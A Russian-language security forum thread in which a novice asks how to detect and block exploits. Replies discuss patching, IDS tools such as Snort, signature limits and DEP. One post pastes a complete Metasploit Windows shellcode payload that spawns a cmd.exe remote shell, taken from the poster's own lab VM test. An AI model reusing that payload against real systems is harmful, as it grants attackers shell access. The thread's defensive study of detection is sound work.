-
Junior Member
- Вес репутации
- 54
Как борятся с эксплоитами?
Всем добрый день! Я скачал исходники антиэксплоита для Linux, для Windows такого я не нашел. Идея борьбы заключается в том что существует база данных MD5 хешей с которыми сравниваются пакеты. Мне хочется самому написать что-нибудь подобное, подскажите пожалуйста механизмы борьбы с експлоитами. Спасибо
-
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
-
Правильный путь борьбы с эксплойтами - установка патчей (обновлений безопасности).
-
-
Junior Member
- Вес репутации
- 54
AndreyKa, спасибо. Я хочу знать какие алгоритмы применяются для борьбы с эксплоитами.
-
-
Junior Member
- Вес репутации
- 54
Сообщение от
Virtual
eboev, никакие, ибо "эксплоит"
это программный код - демонстрирующий использование какой либо уязвимости в чем либо.
так что борются с уязвимостями
. а не с примерами их эксплуатации.
ЗЫ если вам в голову забивают гвоздь, то глупо бороться с молотком, надежней каску одеть, и руки забивальщику оторвать
. шутка-юмора, но аналогия верна.
логично, но на форуме wasm встречаю такую запись: "Вообще я просто однажды придумал метод как бороться с эксплоитам на переполнения так чтобы при этом не только не передавалось управление на враждебный код, но и программа не падала. И начал делать просто как маленькую исследовательскую работу. Потом еще в проект добавились средства для войны с эксплоитами уязвимостей форматной строки." Автор Dunkan, достучаться до него не получилось! Еще информация - Касперский имеет правила на отброс (необработку) некоторых пакетов, например NetSky, что это за пакеты я пока не разбирался, но сам метод мне кажется логичным для борьбы. Еще есть антиэксплоит AntiExploit для Linux - его суть: хранить базу данных MD5 хешей експлоитов и при получении таких файлов - просто отбрасывать их, но у этого метода есть недостатки: надо обновлять базы, которые обновляются с задержкой, база увеличивается, время сравнения растет. Вот пока что я имею! Наш форум советуют на других - люди говорят что здесь все есть про эксплоиты, но я пока не нашел может мне в другой раздел написать?
-
eboev,
для начала изучить терминологию
http://virusinfo.info/showthread.php?t=1498
.далее, решить с какими конкретно типами опасностей хочеш боротся? //т.к. для каждого типа существуют свои и только свои методы.
.....
так что.? чего-ж конкретно то хочеш?
-
Эксплоит под windows и под linux две большие разницы. В основном эксплоиты "идут" не под конкретно операционную систему (хотя например кидо эксплуатировал уъязвимость именно Windows), а под приложения (Акробат ридер, флэш плейр, Офис, java). Поэтому собирать md5 сплоитов бессысленно - можно сделать миллион pdf файлов эксплуатирующих одну и тоже уъязвимость, но имющие разную md5 чек-сумму.
-
-
Alex_Goodwin, как я понял по сумбурному описанию, eboev говорил о системе IDS.
В любом случае ему следует для начала воспользоваться советом Virtual и научиться корректно излагать свою мысль.
-
-
Junior Member
- Вес репутации
- 54
-
-
-
Junior Member
- Вес репутации
- 54
Сообщение от
Alex_Goodwin
Респект Alex_Goodwin
-
Junior Member
- Вес репутации
- 54
Snort - отличная штука, спасибо вам буду использовать его идеи. Я не нашел подобного, имеются какие - нибудь еще проекты IDS с открытыми исходниками?
-
Сообщение от
eboev
если пакет содержит только флаги SYN и FIN то это аттака и мой NDIS драйвер отбросит этот пакет
Самая простая реализация пакетного фильтра сетевых атак описана вот в этом RFC: http://www.networksorcery.com/enp/rfc/rfc3514.txt
Не знаю, почему его никто не читает...
-
-
Junior Member
- Вес репутации
- 54
Поставил виртуальную машину, на нее залил заведомо дырявый Windows. Запустил на виртуальной машине Wireshark, чтобы анализировать входящие пакеты. На родной машине поставил Metasploit Framework 3 и пробил виртуалку, в целях безопасности не буду говорить каким эксплоитом и shell-кодом. Далее я проанализировал shell скрипт, он содержит байт код:
'Payload' =>
"\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\ x8B\x52\x30\x8B" +
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\ x31\xFF\x31\xC0" +
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\ xE2\xF0\x52\x57" +
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\ xC0\x74\x4A\x01" +
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\ x49\x8B\x34\x8B" +
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\ x38\xE0\x75\xF4" +
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\ x01\xD3\x66\x8B" +
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\ x89\x44\x24\x24" +
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\ x12\xEB\x86\x5D" +
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\ x4C\x77\x26\x07" +
"\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\ x29\x80\x6B\x00" +
"\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\ x0F\xDF\xE0\xFF" +
"\xD5\x89\xC7\x31\xDB\x53\x68\x02\x00\x11\x5C\x89\ xE6\x6A\x10\x56" +
"\x57\x68\xC2\xDB\x37\x67\xFF\xD5\x53\x57\x68\xB7\ xE9\x38\xFF\xFF" +
"\xD5\x53\x53\x57\x68\x74\xEC\x3B\xE1\xFF\xD5\x57\ x89\xC7\x68\x75" +
"\x6E\x4D\x61\xFF\xD5\x68\x63\x6D\x64\x00\x89\xE3\ x57\x57\x57\x31" +
"\xF6\x6A\x12\x59\x56\xE2\xFD\x66\xC7\x44\x24\x3C\ x01\x01\x8D\x44" +
"\x24\x10\xC6\x00\x44\x54\x50\x56\x56\x56\x46\x56\ x4E\x56\x56\x53" +
"\x56\x68\x79\xCC\x3F\x86\xFF\xD5\x89\xE0\x4E\x56\ x46\xFF\x30\x68" +
"\x08\x87\x1D\x60\xFF\xD5\xBB\xE0\x1D\x2A\x0A\x68\ xA6\x95\xBD\x9D" +
"\xFF\xD5\x3C\x06\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\ x47\x13\x72\x6F" +
"\x6A\x00\x53\xFF\xD5".
В этом байт-коде есть последовательность \x63\x6D\x64 = cmd, shell код поднимает cmd на машине жертвы. Но вот что странно: я анализировал все входящие пакеты на машине жертвы с помощью Wireshark и не встретил там последовательности cmd, как shell коду удалось запустить cmd.exe?
-
eboev, рано вам начинать заниматся вирусописательством
по вопросу... а в пакетах и не должно в явном виде быть искомого., ибо уязвимость может быть напр за транслятором из юникода в ... //это простейший пример. (создай 2 файла в юникоде и в анси, открой хекс редактором и почувствуй разницу)
-
Junior Member
- Вес репутации
- 54
>>eboev, рано вам начинать заниматся вирусописательством
я хотел сделать сигнатуру на проверку строки "cmd" в пакетах, чтобы парсить пакеты и обнаруживать таким образом шелл-коды.
>>(создай 2 файла в юникоде и в анси, открой хекс редактором и почувствуй >>разницу)
все проделал, там в юникоде 2 байта, последовательность будет c.m.d. такой последовательности в пакетах тоже нет. есть предположение что шелл код шифруется.
-
-
Junior Member
- Вес репутации
- 54
понял, спасибо! Snort использует сигнатуры но не тривиальные, например правило, которе задетектило атаку содержит
content:"|05 00 00|".
-
Junior Member
- Вес репутации
- 54
>>в общем и частном случае, забудь про сигнатурный поиск цмд . >>это точно.
Я теперь подумываю над возможностью мониторить изменение регистра eip.
-
eboev, DEP этим занимается)))
The worst foe lies within the self...
-